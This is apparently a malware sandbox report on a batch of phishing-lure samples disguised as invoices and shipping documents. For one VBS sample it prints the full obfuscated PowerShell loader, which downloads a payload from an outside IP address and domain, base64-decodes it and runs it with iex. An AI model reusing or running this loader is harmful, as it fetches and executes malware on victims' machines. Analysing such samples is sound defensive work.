Overview
overview
10Static
static
50702/30.exe
windows7-x64
30702/30.exe
windows10-2004-x64
30702/710_S...FT.scr
windows7-x64
30702/710_S...FT.scr
windows10-2004-x64
30702/DHL A...LS.exe
windows7-x64
100702/DHL A...LS.exe
windows10-2004-x64
100702/FedEx...43.xls
windows7-x64
30702/FedEx...43.xls
windows10-2004-x64
10702/ISOTR...ry.scr
windows7-x64
30702/ISOTR...ry.scr
windows10-2004-x64
30702/KWOTASIE.exe
windows7-x64
80702/KWOTASIE.exe
windows10-2004-x64
80702/Maers...st.vbs
windows7-x64
80702/Maers...st.vbs
windows10-2004-x64
80702/MpClient.dll
windows7-x64
70702/MpClient.dll
windows10-2004-x64
70702/ORDER...024.js
windows7-x64
80702/ORDER...024.js
windows10-2004-x64
80702/PETUN...sx.scr
windows7-x64
100702/PETUN...sx.scr
windows10-2004-x64
100702/PO-24...890.js
windows7-x64
80702/PO-24...890.js
windows10-2004-x64
80702/Payme...1).vbs
windows7-x64
80702/Payme...1).vbs
windows10-2004-x64
80702/Payme...ts.vbs
windows7-x64
80702/Payme...ts.vbs
windows10-2004-x64
80702/QUOTA...DF.scr
windows7-x64
30702/QUOTA...DF.scr
windows10-2004-x64
30702/RFQ Q...00.exe
windows7-x64
50702/RFQ Q...00.exe
windows10-2004-x64
50702/Revis...93.vbs
windows7-x64
80702/Revis...93.vbs
windows10-2004-x64
8Analysis
-
max time kernel
149s -
max time network
154s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system -
submitted
30-11-2024 15:28
Static task
static1
Behavioral task
behavioral1
Sample
0702/30.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
0702/30.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
0702/710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
0702/710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
0702/DHL AWB COMMERCAIL INVOICE AND TRACKNG DETAILS.exe
Resource
win7-20240729-en
Behavioral task
behavioral6
Sample
0702/DHL AWB COMMERCAIL INVOICE AND TRACKNG DETAILS.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
0702/FedEx Receipt_53065724643.xls
Resource
win7-20240729-en
Behavioral task
behavioral8
Sample
0702/FedEx Receipt_53065724643.xls
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
0702/ISOTRAILER Trailer Sheets Inquiry.scr
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
0702/ISOTRAILER Trailer Sheets Inquiry.scr
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
0702/KWOTASIE.exe
Resource
win7-20240903-en
Behavioral task
behavioral12
Sample
0702/KWOTASIE.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral13
Sample
0702/Maersk_BL_Invoice_Packinglist.vbs
Resource
win7-20240708-en
Behavioral task
behavioral14
Sample
0702/Maersk_BL_Invoice_Packinglist.vbs
Resource
win10v2004-20241007-en
Behavioral task
behavioral15
Sample
0702/MpClient.dll
Resource
win7-20240903-en
Behavioral task
behavioral16
Sample
0702/MpClient.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral17
Sample
0702/ORDER-7019-2024.js
Resource
win7-20240903-en
Behavioral task
behavioral18
Sample
0702/ORDER-7019-2024.js
Resource
win10v2004-20241007-en
Behavioral task
behavioral19
Sample
0702/PETUNJUK-PENGISIAN DAN PENGIRIMAN KONFIRMASI EDITED-xlsx.scr
Resource
win7-20240903-en
Behavioral task
behavioral20
Sample
0702/PETUNJUK-PENGISIAN DAN PENGIRIMAN KONFIRMASI EDITED-xlsx.scr
Resource
win10v2004-20241007-en
Behavioral task
behavioral21
Sample
0702/PO-24701248890.js
Resource
win7-20240903-en
Behavioral task
behavioral22
Sample
0702/PO-24701248890.js
Resource
win10v2004-20241007-en
Behavioral task
behavioral23
Sample
0702/Payment Confirmation (1).vbs
Resource
win7-20241023-en
Behavioral task
behavioral24
Sample
0702/Payment Confirmation (1).vbs
Resource
win10v2004-20241007-en
Behavioral task
behavioral25
Sample
0702/Payment_Confirmation_Receipts.vbs
Resource
win7-20240708-en
Behavioral task
behavioral26
Sample
0702/Payment_Confirmation_Receipts.vbs
Resource
win10v2004-20241007-en
Behavioral task
behavioral27
Sample
0702/QUOTATION_JULQTRA071244úPDF.scr
Resource
win7-20240903-en
Behavioral task
behavioral28
Sample
0702/QUOTATION_JULQTRA071244úPDF.scr
Resource
win10v2004-20241007-en
Behavioral task
behavioral29
Sample
0702/RFQ QUG24-200370054200.exe
Resource
win7-20240903-en
Behavioral task
behavioral30
Sample
0702/RFQ QUG24-200370054200.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral31
Sample
0702/Revised Invoice 7389293.vbs
Resource
win7-20241023-en
Behavioral task
behavioral32
Sample
0702/Revised Invoice 7389293.vbs
Resource
win10v2004-20241007-en
General
-
Target
0702/Revised Invoice 7389293.vbs
-
Size
26KB
-
MD5
ed86258f8c9db682ae810896c67d498c
-
SHA1
e182aef5ecacc6bec36e9bc2bb255436b9dae698
-
SHA256
64c701bc7d32900bf11e8f5dd9bed584d350a949c467f5fd6643e8cd7f902fcd
-
SHA512
b90e69ed8c473994472b813ef68c45d91e4c46485227f109d400a8b7d4ebfe425abc585387ed61f9e51fd00fd6cdca16f9bf4bf1800082d9cebc8d650429822a
-
SSDEEP
384:PlzV6m2So022lGP9V6+s0flKJpl/5ZrE5HVnS0Re7PIx+5lEPmgwwCjnvhTT1EFw:9zSR022X/523S0e8xPPmVvJr08hpouGs
Malware Config
Signatures
-
Blocklisted process makes network request 13 IoCs
flow pid Process 3 2624 WScript.exe 6 2948 powershell.exe 7 2948 powershell.exe 9 2948 powershell.exe 10 2948 powershell.exe 11 2948 powershell.exe 12 2948 powershell.exe 13 2948 powershell.exe 14 2948 powershell.exe 15 2948 powershell.exe 16 2948 powershell.exe 17 2948 powershell.exe 18 2948 powershell.exe -
pid Process 2948 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2948 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2948 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2624 wrote to memory of 2948 2624 WScript.exe 31 PID 2624 wrote to memory of 2948 2624 WScript.exe 31 PID 2624 wrote to memory of 2948 2624 WScript.exe 31 PID 2948 wrote to memory of 2324 2948 powershell.exe 33 PID 2948 wrote to memory of 2324 2948 powershell.exe 33 PID 2948 wrote to memory of 2324 2948 powershell.exe 33
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0702\Revised Invoice 7389293.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2624 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Relinquishments Middelvejen Oksehalens Sekstenaarsfdselsdagens Transceive2 Bewailment Prmielaanets opbyggendes Kulturudbuddets156 helliggjordes disrates Corrosible ladybug Opvikle Udvalgsprocedurens191 Eutaxies Anaphora Radierer Testatorernes Optegnelsesbger Ministrant187 Algums Indberetningspligter Wakerobin Relinquishments Middelvejen Oksehalens Sekstenaarsfdselsdagens Transceive2 Bewailment Prmielaanets opbyggendes Kulturudbuddets156 helliggjordes disrates Corrosible ladybug Opvikle Udvalgsprocedurens191 Eutaxies Anaphora Radierer Testatorernes Optegnelsesbger Ministrant187 Algums Indberetningspligter Wakerobin';If (${host}.CurrentCulture) {$Cuculidae++;}Function Glycosemia205($Drfyldingernes){$Folkloric=$Drfyldingernes.Length-$Cuculidae;$Decalvant='SUBsTRI';$Decalvant+='ng';For( $Fritures=1;$Fritures -lt $Folkloric;$Fritures+=2){$Relinquishments+=$Drfyldingernes.$Decalvant.Invoke( $Fritures, $Cuculidae);}$Relinquishments;}function Eksistensminimas($Rettesnorene){ &($Prosadigtene) ($Rettesnorene);}$signallygtens=Glycosemia205 'AM.o z i l.lRa./ 5U. 0, b( Wsi.nEd o w s, ,NdT. 1C0M. 0U;, SW i n 6 4A;t .x 6 4G; Tr vK: 1 2G1 . 0n). AG,e cOk oS/ 2 0 1 0,0 1A0R1. ,F itrMerfSo,xO/ 1M2 1 .A0F ';$Millihg=Glycosemia205 ' UCs eor - A,gDe.nFt ';$Transceive2=Glycosemia205 'sh,t t pD: /S/N1 0 3 ..1F9E5 .U2 3N7S. 4.3,/ N y.e t .KqOxFdS> h tAt.pSsE:P/,/Tm,i l aDn aRcOe.sA.Cc,o,m / N,y.e t ..qAxEdv ';$Mellemliggende=Glycosemia205 ',>. ';$Prosadigtene=Glycosemia205 'DiAeSx ';$Distendedly='opbyggendes';$Tilbageholdelses = Glycosemia205 'ce.c,hMoU S%,aRp.pKd aRtDaS%s\ s.tBa,l lLm aUnP. FArBoN &C&K IeOcEhco St ';Eksistensminimas (Glycosemia205 'D$ g.lHoEbSaNlP:SP a.rua,l l e lReVd =.( cSmTd ./Uc $GT,i l,b aBg e.h o,lPd.e.l s.eFsS)H ');Eksistensminimas (Glycosemia205 'U$igIlSo bSaAl :USUe.kUsLtMeUnHa,a rBsCf,dSsFeelfs d.aIgZeunMsH=p$,TArUa.nAs,cUePi.v e.2 .Os,p.l,i,tI(H$UM e.lPlDePm.l.iBg.gFeVn d eT)I ');Eksistensminimas (Glycosemia205 ' [ N e.t,.oSAe.r v iRcEe.PDo iUn t MFa,n a,g eIr ]L:K: S e.c uFrfi t y PSrNoStCoScBo,l =s M[ NRe.tU..SSe,c u rTi t y,PSrDo tGoHcPoClrT,yBpAeF] :A:CT.lOs 1D2 ');$Transceive2=$Sekstenaarsfdselsdagens[0];$Lothar= (Glycosemia205 'A$,gfl o b aUl :,D i s eJnLtTe.r =VNNeRw - O.bRj.eBc tC S y,s t e,mI.AN.e tk. WTeIb,CFl.ile,n t');$Lothar+=$Paralleled[1];Eksistensminimas ($Lothar);Eksistensminimas (Glycosemia205 'S$DDRiCsDeTnGt.e rS. HPeRaNd eSrKs [C$,MLi.lAlPiKhGg ]D=P$ s,i g n aPlHl y.g.tte nMsP ');$Emigated=Glycosemia205 ' $ DFi,s,eVnLt eSrS.PDBoUwRnYl ofa,d F.i l e (N$FT,rAaSnTs cKe iNvFe 2S,P$TANl g,u.mAsF) ';$Algums=$Paralleled[0];Eksistensminimas (Glycosemia205 'A$ g l.oFbCa lG: BNuMfHf.ePrSe dG= ( TRe,sSt,- PDa t h R$HA,l g uSmTs,) ');while (!$Buffered) {Eksistensminimas (Glycosemia205 ' $BgClhoObiaCl :SA,n.g eSlMi.cLnAePsRsF= $AtKrSuDe ') ;Eksistensminimas $Emigated;Eksistensminimas (Glycosemia205 'BS tFa rEtO- S lOeAePpL f4P ');Eksistensminimas (Glycosemia205 'P$fg,l o b a lF:SBHuKfSf.eSrfesd,=W(UT eSs.t -CPEa t h $.AAl,gFuBm s )U ') ;Eksistensminimas (Glycosemia205 'S$LgNlAoPbMaSl :VO,k,sBeEh,aKl eRnls,=,$.g,l o b.acl : M iKd dTe lSv e jSeTn.+.+M%C$DSKe kOsSt.e nPaWaSrds fAd sHeUlPs.dHaVgFeFnfs..ncTopuhnNt. ') ;$Transceive2=$Sekstenaarsfdselsdagens[$Oksehalens];}$Sandhedsvidnet=334484;$Phytol=26427;Eksistensminimas (Glycosemia205 ' $ gNl o bNa lI:TK u.lOtDuMrPuNdAbCuMd d e tQs 1U5S6a C=T TGSe t -PC o nPtCeKn tB $.AOlSg,uCmKsC ');Eksistensminimas (Glycosemia205 ' $Ig l o bRa.lK:BsVw a.gT G=, [BSsy s tUeFm .SCbo nLvCe rNt ]D: : FSrAo mtBFa.s.eR6.4fS t rDiDnPg (A$,KRuMl t u r u.d b,u dAdJe t,s,1K5 6V) ');Eksistensminimas (Glycosemia205 ' $ g,l oSb aKl :.CFo rKrMo sSi b,l.e ,=P [ S.yFsBt,eSm..ETSe,xSth.KE n cJoFdji,n g ]H:J:VASS C.I,IS.,G,e tHSGt.r i nGg (b$ sRwPa,g,), ');Eksistensminimas (Glycosemia205 'E$TgUl oEb.aFl.:SEBhbrBlgiMc h,m,a,nS=B$ C oCrrrCoDs iTbDlTe.. sSuRb,s t r,iTnBgp(B$,S a,n.d,h e d.s v iFd.nSeHt ,B$ PSh y tSo,l,)O ');Eksistensminimas $Ehrlichman;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2948 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\stallman.Fro && echo t"3⤵PID:2324
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b